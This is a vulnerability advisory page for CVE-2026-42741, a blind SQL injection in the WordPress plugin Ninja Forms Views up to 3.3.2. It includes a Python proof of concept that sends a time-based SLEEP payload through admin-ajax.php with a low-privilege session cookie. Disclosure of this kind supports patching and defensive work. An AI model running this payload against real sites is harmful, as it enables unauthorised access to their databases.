Security Vulnerability Report
中文
CVE-2026-42741 CVSS 8.5 HIGH

CVE-2026-42741

Published: 2026-05-12 11:16:20
Last Modified: 2026-05-12 14:03:53

Description

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Aman Ninja Forms Views &#8211; Display &amp; Edit Ninja Forms Submissions on your site frontend views-for-ninja-forms allows Blind SQL Injection.This issue affects Ninja Forms Views &#8211; Display &amp; Edit Ninja Forms Submissions on your site frontend: from n/a through <= 3.3.2.

CVSS Details

CVSS Score
8.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:L

Configurations (Affected Products)

No configuration data available.

Ninja Forms Views <= 3.3.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # Target configuration target_url = "http://target-wordpress-site.com/wp-admin/admin-ajax.php" # Attacker cookies (low privilege session) cookies = { "wordpress_logged_in_xxx": "low_privilege_session_cookie" } # Payload for Time-Based Blind SQL Injection # Logic: If the database sleeps for 5 seconds, the condition is true. payload_data = { "action": "nf_views_ajax_action", "submission_id": "1 AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)" } try: print("[+] Sending SQL Injection payload...") response = requests.post(target_url, data=payload_data, cookies=cookies, timeout=10) # Check if the response time indicates success if response.elapsed.total_seconds() >= 5: print("[+] Vulnerability Confirmed: Database responded with delay (Blind SQLi).") else: print("[-] Vulnerability not detected or payload invalid.") except requests.exceptions.RequestException as e: print(f"[!] Error during request: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-42741", "sourceIdentifier": "[email protected]", "published": "2026-05-12T11:16:20.103", "lastModified": "2026-05-12T14:03:52.757", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Aman Ninja Forms Views &#8211; Display &amp; Edit Ninja Forms Submissions on your site frontend views-for-ninja-forms allows Blind SQL Injection.This issue affects Ninja Forms Views &#8211; Display &amp; Edit Ninja Forms Submissions on your site frontend: from n/a through <= 3.3.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:L", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.1, "impactScore": 4.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/views-for-ninja-forms/vulnerability/wordpress-ninja-forms-views-display-edit-ninja-forms-submissions-on-your-site-frontend-plugin-3-3-2-sql-injection-vulnerability?_s_id=cve", "source": "[email protected]"}]}}